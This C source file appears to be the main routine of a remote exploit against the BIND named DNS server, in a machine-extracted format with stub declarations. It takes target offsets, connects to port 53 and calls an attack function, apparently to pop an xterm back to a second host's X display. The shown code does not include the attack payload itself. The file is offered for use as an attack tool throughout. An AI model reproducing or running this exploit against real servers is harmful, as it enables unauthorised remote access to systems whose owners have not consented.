
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


struct in_addr {void* s_addr; } ;
struct sockaddr_in {struct in_addr sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
typedef int sa ;
struct TYPE_3__ {char* desc; scalar_t__ addr; scalar_t__ opt_addr; } ;


 int AF_INET ;
 unsigned long DEFAULT_ANBUF_OFFSET ;
 int DEFAULT_OPTIMIZED ;
 int DEFAULT_TARGET ;
 int IPPROTO_TCP ;
 int SOCK_STREAM ;
 void* atoi (char*) ;
 int attack (int,struct in_addr,TYPE_1__,unsigned long,int) ;
 scalar_t__ close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int htons (int) ;
 char* inet_ntoa (struct in_addr) ;
 int perror (char*) ;
 int printf (char*,...) ;
 void* resolve (char*) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 TYPE_1__* target ;

int main(int argc, char *argv[])
{
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
  struct sockaddr_in sa;
  struct in_addr xs;

  for(i=0;target[i].desc[0];i++);

  if(argc<3)
    {
      fprintf(stderr,"\ntarget types:\n");
      fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
       "description");
      for(target_index=0;target_index<i;target_index++)
 fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
  (unsigned int)target[target_index].addr,
  (unsigned int)target[target_index].opt_addr,
  target[target_index].desc);
      fprintf(stderr,
       "\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
       argv[0]);
      exit(-1);
    }

  if((argc>3)&&((target_index=atoi(argv[3]))>=i))
    {
      fprintf(stderr,"error: invalid target type %d\n",target_index);
      exit(-1);
    }

  if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
    {
      fprintf(stderr,"error: internal error\n");
      exit(-1);
    }

  if(argc>4)
    {
      optimized = atoi(argv[4]);
      if((optimized!=0)&&(optimized!=1))
 {
   fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
   exit(-1);
 }
    }

  if((optimized==0)&&(target[target_index].addr==0))
    optimized = 1;

  if((optimized==1)&&(target[target_index].opt_addr==0))
    optimized = 0;

  if(argc>5)
    offset = atoi(argv[5]);

  if(!(xs.s_addr=resolve(argv[2])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
      exit(-1);
    }

  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
    {
      perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      perror("error: connect");
      exit(-1);
    }

  printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  printf("target type        : %s\n",target[target_index].desc);
  printf("optimized named    : %s\n",(optimized?"YES":"NO"));
  printf("anbuff addr        : 0x%x\n",(unsigned int)
  (optimized?target[target_index].opt_addr:target[target_index].addr));
  printf("anbuff addr offset : %lu\n",offset);
  printf("xterm display dest : %s:0\n",inet_ntoa(xs));
  printf("exploiting . . .\n");

  switch(attack(sock,xs,target[target_index],offset,optimized))
    {
    case -1:
      perror("error: attack");
      return(-1);
      break;

    case 0:
      fprintf(stderr,"error: internal error\n");
      return(-1);
      break;
    }

  if(close(sock)!=0)
    {
      perror("error: close");
      return(-1);
    }

  exit(0);
}
